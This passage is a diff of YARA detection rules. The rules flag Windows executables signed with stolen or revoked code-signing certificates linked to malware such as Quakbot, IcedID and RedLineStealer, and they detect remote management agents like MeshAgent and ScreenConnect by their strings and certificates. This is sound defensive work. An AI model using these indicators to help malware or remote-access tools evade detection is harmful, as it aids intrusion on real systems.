 		tags = "FILE"
-		thumbprint = "2b18684a4b1348bf78f6d58d3397ee5ca80610d1c39b243c844e08f1c1e0b4bf"
-		reason = "Lazarus"
+		thumbprint = "d7fdad88c626b8e6d076f3f414bbae353f444618"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SAMOYAJ LIMITED" and pe.signatures [ i ] . serial == "02:9b:f7:e1:cb:09:fe:27:75:64:bd:27:c2:67:de:5a" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Abfacfbdcd" and pe.signatures [ i ] . serial == "7d:08:a7:47:47:55:7d:60:16:aa:af:47:a6:79:31:2f" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_984E84Cfe362E278F558E2C70Aaafac2 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_2095C6F1Eadb65Ce02862Bd620623B92 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "3d071d42-b96a-5491-96f5-4605b6b5584e"
+		id = "c44d8942-569b-50c6-8363-0576c7d54dfb"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8881-L8894"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3347-L3358"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a3a42c5b6ad094deb2a9f33789b6f7e52f76e65b2336372341f16389cef40f88"
+		logic_hash = "0b75d8c59486d197f2cdff298114a7367bb6ad4cf71ee28273e0946e42d3f7e8"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "0b2d1dad72c69644f80ad871743878b5eb1e45e451d0d2c9579bdf81384f8727"
-		reason = "Quakbot"
+		thumbprint = "940a4d4a5aadef70d8c14caac6f11d653e71800f"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Arctic Nights Äkäslompolo Oy" and pe.signatures [ i ] . serial == "98:4e:84:cf:e3:62:e2:78:f5:58:e2:c7:0a:aa:fa:c2" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Febeecad" and pe.signatures [ i ] . serial == "20:95:c6:f1:ea:db:65:ce:02:86:2b:d6:20:62:3b:92" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_45245Eef53Fcf38169C715Cf68F44452 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_899E32C9Bf2B533B9275C39F8F9Ff96D : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "3e92744d-1eb8-511a-b933-6dbe1e74fcfd"
+		id = "62ecae58-7576-5170-8eb5-2becd292e5de"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8896-L8909"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3373-L3384"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7667563aa02be9a85ba286bc16eb37380d5988b32f0ce27b1dbd9ae18b8b9175"
+		logic_hash = "c5fe3726fd19d050e762cc9e4e2099e74e3780c89a75dab55c12e16bfecd8642"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "ad7edb1b0a6a1ee3297a8825aff090030142dce8b59b9261bc57ca86666b0cbe"
-		reason = "QuakBot"
+		thumbprint = "329af76d7c84a90f2117893adc255115c3c961c7"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PAPER AND CORE SUPPLIES LTD" and pe.signatures [ i ] . serial == "45:24:5e:ef:53:fc:f3:81:69:c7:15:cf:68:f4:44:52" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Eecaaffcbfdffaedcfec" and pe.signatures [ i ] . serial == "89:9e:32:c9:bf:2b:53:3b:92:75:c3:9f:8f:9f:f9:6d" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0406C4A1521A38C8D0C4Aa214388E4Dc : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0B5759Bc22Ad2128B8792E8535F9161E : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "108dd1b8-110a-5680-bd96-5517392300fa"
+		id = "c35c4e07-73d9-54d6-a8cb-1558502a82e9"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8911-L8924"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3386-L3397"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3db3a4f424d2974b746b8290a461f777eb88e0d8c6048e6e51e561c1f91b7747"
+		logic_hash = "1ee543c204e5bf004224a2010f8cfd3196bb9c1e96de350548403224eaa502f6"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "7d6dc731d94c9aaf241f3df940ce8ca8393380b12f92e872273ae747c5d4791f"
-		reason = "IcedID"
+		thumbprint = "ddfd6a93a8d33f0797d5fdfdb9abf2b66e64350a"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Venezia Design SRL" and pe.signatures [ i ] . serial == "04:06:c4:a1:52:1a:38:c8:d0:c4:aa:21:43:88:e4:dc" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ceeacfeacafdcdffabdbbacf" and pe.signatures [ i ] . serial == "0b:57:59:bc:22:ad:21:28:b8:79:2e:85:35:f9:16:1e" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_5Ef27Fc51Ee80B30430947C9967Db440 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_630Cf0E612F12805Ffa00A41D1032D7C : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "53f7b334-8feb-5581-a64c-5db6558a6434"
+		id = "1c3e2b33-24e5-584c-b375-96c1e653a3ca"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8926-L8939"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3399-L3410"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e282054102d852c0f66435148ce97050b15fb6f60f5d1bfc875b02de9c50c297"
+		logic_hash = "2256858ae75c47568fc6a38e2a587d302d99dd396dd398a450eaa6459ed55d13"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "c2dcc4a1ea16e45f86828e81eda20f83e70cbf77e152ddd80b1b4a730ef77551"
-		reason = "RedLineStealer"
+		thumbprint = "107af72db66ec4005ed432e4150a0b6f5a9daf2d"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMCERT,LLC" and pe.signatures [ i ] . serial == "5e:f2:7f:c5:1e:e8:0b:30:43:09:47:c9:96:7d:b4:40" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dadebfaca" and pe.signatures [ i ] . serial == "63:0c:f0:e6:12:f1:28:05:ff:a0:0a:41:d1:03:2d:7c" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_672237253A9B7Ef9D02D7D1Cb27A3Ff4 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_603Bce30597089D068320Fc77E400D06 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - DitekSHen"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "590b3764-c4e2-59a5-b263-bc3e0d57c85a"
+		id = "0f2a2411-f3d4-5959-8470-d7424d714c1d"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8941-L8952"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3412-L3423"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9b989f8d89c566980f3f7e6490f0271ab0f531fb2717b55e6f3b7ff6fadd9144"
+		logic_hash = "1e13c78cec21a015d9593b492ce5040f93247be63c079bfece96a3a74055aeba"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "36a0f423c1fa48f172e4fecd06b8099f0ebbaeb8"
+		thumbprint = "4ddda7e006afb108417627f8f22a6fa416e3f264"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Foshan Yongqiheng Trading Co., Ltd." and pe.signatures [ i ] . issuer contains "Certum Extended Validation Code Signing 2021 CA" and pe.signatures [ i ] . serial == "67:22:37:25:3a:9b:7e:f9:d0:2d:7d:1c:b2:7a:3f:f4" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fcaddefffedacfc" and pe.signatures [ i ] . serial == "60:3b:ce:30:59:70:89:d0:68:32:0f:c7:7e:40:0d:06" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_708737C791C878D6Dd7B7C43 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_5D5D03Edb4Ec4E185Caa3041824Ab75C : FILE
 {
 	meta:
-		description = "No description has been set in the source file - DitekSHen"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "65f3827d-25c4-59bb-8555-508c3e92ed5d"
+		id = "e1c93911-5c7c-5fe8-aed3-014a9bb7379e"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8954-L8965"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3425-L3436"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5e47fc7ed52e57aafc5eb2f1d56eb8296080218b65d70879bd75fd1a0ac58f66"
+		logic_hash = "863a1496ce37449fa7e94c407ce0e63a9d727fef9094135715d0cb14ed442e5e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "7ed7081ee612fbf9fe0ade46f4a2749da20251e0"
+		thumbprint = "f6c9c564badc1bbd8a804c5e20ab1a0eff89d4c0"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Langfang Alkem Material Technology Co., Ltd." and pe.signatures [ i ] . issuer contains "GlobalSign GCC R45 EV CodeSigning CA 2020" and pe.signatures [ i ] . serial == "70:87:37:c7:91:c8:78:d6:dd:7b:7c:43" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ffcdcbacfeaedbfbcecccafeb" and pe.signatures [ i ] . serial == "5d:5d:03:ed:b4:ec:4e:18:5c:aa:30:41:82:4a:b7:5c" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0Bc777F88Ddf5F3Ce479452F : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_Aec009984Fa957F3F48Fe3104Ca9Babc : FILE
 {
 	meta:
-		description = "No description has been set in the source file - DitekSHen"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "da891fe8-fe9f-53f8-836c-161d13fd5382"
+		id = "76b5d6b6-f443-55b5-b353-88201fe09e1f"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8967-L8978"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3438-L3449"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "988fd5e652910f7b4388fe5bed91195261ff95d84cc7e53a389432577a114baa"
+		logic_hash = "de9008e30468b94b4afbc622403b0257f5c5e3964344b980c18fc95219e06667"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "55aa40dea5621f0c0fbc8b9dd8066ff2290a7e82"
+		thumbprint = "9d5b6bc86775395992a25d21d696d05d634a89d1"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ARION LLC" and pe.signatures [ i ] . issuer contains "GlobalSign GCC R45 EV CodeSigning CA 2020" and pe.signatures [ i ] . serial == "0b:c7:77:f8:8d:df:5f:3c:e4:79:45:2f" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ceefaccdedbfbbaaaadacdbf" and pe.signatures [ i ] . serial == "ae:c0:09:98:4f:a9:57:f3:f4:8f:e3:10:4c:a9:ba:bc" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_691Ed2236Cca78D180F29Dfd : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_283518F1940A11Caf187646D8063D61D : FILE
 {
 	meta:
-		description = "No description has been set in the source file - DitekSHen"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "f889f1a6-070d-505e-aaa6-0d454f52a876"
+		id = "cf5f7f11-3af6-577b-9a5e-eafe2de34e2b"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8980-L8991"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3451-L3462"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "94e7c3aea1fca253395eae398176dc9875ca1f1c13002063b5eda8ffb4ad973f"
+		logic_hash = "7db16bc44059e2538eb896011598a599c6aead90fb873c530ce8f5391e440164"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "8c8a043f51bb8d59182fb268c0db2f1b9d876dbe"
+		thumbprint = "aaeb19203b71e26c857613a5a2ba298c79910f5d"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "COSMART LLC" and pe.signatures [ i ] . issuer contains "GlobalSign GCC R45 EV CodeSigning CA 2020" and pe.signatures [ i ] . serial == "69:1e:d2:23:6c:ca:78:d1:80:f2:9d:fd" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Eeeeeeba" and pe.signatures [ i ] . serial == "28:35:18:f1:94:0a:11:ca:f1:87:64:6d:80:63:d6:1d" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_3B0E3879266F3Bc98225B390 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_72F3E4707B94D0Eef214384De9B36E : FILE
 {
 	meta:
-		description = "No description has been set in the source file - DitekSHen"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "0b85d4be-678a-51a1-acbc-3e7b94bec804"
+		id = "bf02ea89-b3f3-58a1-8bcd-1a23b3c96b68"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8993-L9004"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3464-L3475"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2d480534c046e38fe90ee01dc0fa9abf1ade15f879c3770f3df54c6e2c2e1552"
+		logic_hash = "c2a310ff70012076856239b5b5e6b46ffa121479dea38815e61f5336cecf8868"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "2eab64a4eaf37060d27620a822df2e1f18ac28f6"
+		thumbprint = "e2a5a2823b0a56c88bfcb2788aa4406e084c4c9b"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Hangzhou Yueju Apparel Co., Ltd." and pe.signatures [ i ] . issuer contains "GlobalSign GCC R45 EV CodeSigning CA 2020" and pe.signatures [ i ] . serial == "3b:0e:38:79:26:6f:3b:c9:82:25:b3:90" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Eaaebecedccfd" and pe.signatures [ i ] . serial == "72:f3:e4:70:7b:94:d0:ee:f2:14:38:4d:e9:b3:6e" )
 }
-rule DITEKSHEN_INDICATOR_RMM_Meshagent : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00D875B3E3F2Db6C3Eb426E24946066111 : FILE
 {
 	meta:
-		description = "Detects MeshAgent. Review RMM Inventory"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "3d0baa87-22c9-569d-ba84-37ccaac577b8"
-		date = "2023-08-22"
+		id = "a44cde8b-904b-5f1a-8cdb-4a8b16a42669"
+		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L3-L27"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3477-L3488"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f36c0e23b20e4466100cf4ea2a91515bf1d54505e7b1f0926a4e416a04e0dbcf"
+		logic_hash = "470424bf28b723063be5d6801ee27b0f3748b761f9005616dcab4bd864db5463"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav1 = "INDICATOR.Win.RMM.MeshAgent"
-
-	strings:
-		$x1 = "\\MeshAgent" wide
-		$x2 = "Mesh Agent" wide
-		$x3 = "MeshDummy" wide
-		$x4 = "MeshCentral" wide
-		$x5 = "ILibRemoteLogging.c" ascii
-		$x6 = "AgentCore/MeshServer_" wide
-		$s1 = "var _tmp = 'Detected OS: ' + require('os').Name;" ascii
-		$s2 = "console.log(getSHA384FileHash(process.execPath).toString('hex'))" ascii
-		$s3 = "ScriptContainer.Create(): Error spawning child process, using [%s]" fullword ascii
-		$s4 = "{\"agent\":\"" ascii
-		$s6 = "process.versions.commitHash" fullword ascii
-		$s7 = "console.log('Error Initializing script from Zip file');process._exit();" fullword ascii
+		thumbprint = "d27211a59dc8a4b3073d116621b6857c3d70ed04"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $x* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) or 6 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kubit LLC" and pe.signatures [ i ] . serial == "00:d8:75:b3:e3:f2:db:6c:3e:b4:26:e2:49:46:06:61:11" )
 }
 
-rule DITEKSHEN_INDICATOR_RMM_Meshagent_CERT : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_3990362C34015Ce4C23Ecc3377Fd3C06 : FILE
 {
 	meta:
-		description = "Detects Mesh Agent by (default) certificate. Review RMM Inventory"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "b4b52faa-53a5-5ecf-bff8-984994449ee0"
-		date = "2023-08-22"
+		id = "e76824c2-6ee7-5117-a83f-0b8e4f2d3b61"
+		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L29-L42"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3490-L3501"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d8ac3aec723a87146be99aefbde5642d095d8d41f69c6f5e9981c39104790d33"
+		logic_hash = "5e91a10f5027cae35524bef326edf7d5bf3df5bbc37c111b01e33f7667b03ce3"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		thumbprint = "48444dec9d6839734d8383b110faabe05e697d45"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "MeshCentralRoot-" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RZOH ApS" and pe.signatures [ i ] . serial == "39:90:36:2c:34:01:5c:e4:c2:3e:cc:33:77:fd:3c:06" )
 }
-rule DITEKSHEN_INDICATOR_RMM_Connectwise_Screenconnect : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_54A6D33F73129E0Ef059Ccf51Be0C35E : FILE
 {
 	meta:
-		description = "Detects ConnectWise Control (formerly ScreenConnect). Review RMM Inventory"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d752b7e4-b595-56cb-97f1-a60e73160e5a"
-		date = "2023-08-22"
+		id = "7b010276-718f-5168-bd8c-414252996fe6"
+		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L62-L83"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3503-L3514"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "43003f97c33c631a2806ce2b82b2367d2452ceb21b0267b5dfe78b350b66924a"
+		logic_hash = "93b332e4ad4e13c7e8241cf866091708232a6555a9240d828e558688167359a0"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-		clamav1 = "INDICATOR.Win.RMM.ConnectWise-ScreenConnect"
-
-	strings:
-		$s1 = "FILESYSCREENCONNECT.CORE, VERSION=" wide
-		$s2 = "feedback.screenconnect.com/Feedback.axd" wide
-		$s3 = /ScreenConnect (Software|Client)/ wide
-		$s4 = "ScreenConnect.InstallerActions!ScreenConnect." wide
-		$s5 = "\\\\.\\Pipe\\TerminalServer\\SystemExecSrvr\\" wide
-		$s6 = "\\jmorgan\\Source\\cwcontrol\\Custom\\DotNetRunner\\" wide
-		$s7 = "ScreenConnect." ascii
-		$s8 = "\\ScreenConnect.Core.pdb" ascii
-		$s9 = "relay.screenconnect.com" ascii
+		thumbprint = "8ada307ab3a8983857d122c4cb48bf3b77b49c63"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0xcfd0 ) and 3 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "STAFFORD MEAT COMPANY, INC." and pe.signatures [ i ] . serial == "54:a6:d3:3f:73:12:9e:0e:f0:59:cc:f5:1b:e0:c3:5e" )
 }
 
-rule DITEKSHEN_INDICATOR_RMM_Connectwise_Screenconnect_CERT : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0A55C15F733Bf1633E9Ffae8A6E3B37D : FILE
 {
 	meta:
-		description = "Detects ConnectWise Control (formerly ScreenConnect) by (default) certificate. Review RMM Inventory"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "7a032c24-8a9e-51c3-983e-62e13594aa35"
-		date = "2023-08-22"
+		id = "86d8453b-115d-59f8-8123-5aff071ec3dd"
+		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L85-L99"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3516-L3527"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "14291bd9ddb7fd3ee7932f8104687aae58fe7f5de13726153e5e1ee9c211f598"
+		logic_hash = "a772edb12dc0c351bb4d11f3e6ab3d9705af156ebeb4b8fff281bb418bfa1764"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		thumbprint = "591f68885fc805a10996262c93aab498c81f3010"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "DigiCert" and pe.signatures [ i ] . subject contains "Connectwise, LLC" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Osnova OOO" and pe.signatures [ i ] . serial == "0a:55:c1:5f:73:3b:f1:63:3e:9f:fa:e8:a6:e3:b3:7d" )
 }
-rule DITEKSHEN_INDICATOR_RMM_Fleetdeck_Agent : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00F675139Ea68B897A865A98F8E4611F00 : FILE
 {
 	meta:
-		description = "Detects FleetDeck Agent. Review RMM Inventory"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "342a196c-1c5c-5951-85e4-d288311b4980"
-		date = "2023-08-22"
+		id = "7035ed66-73f9-568e-9698-13d9bbede64e"
+		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L101-L123"
+		reference = "https://github.com/ditekshen/detection"
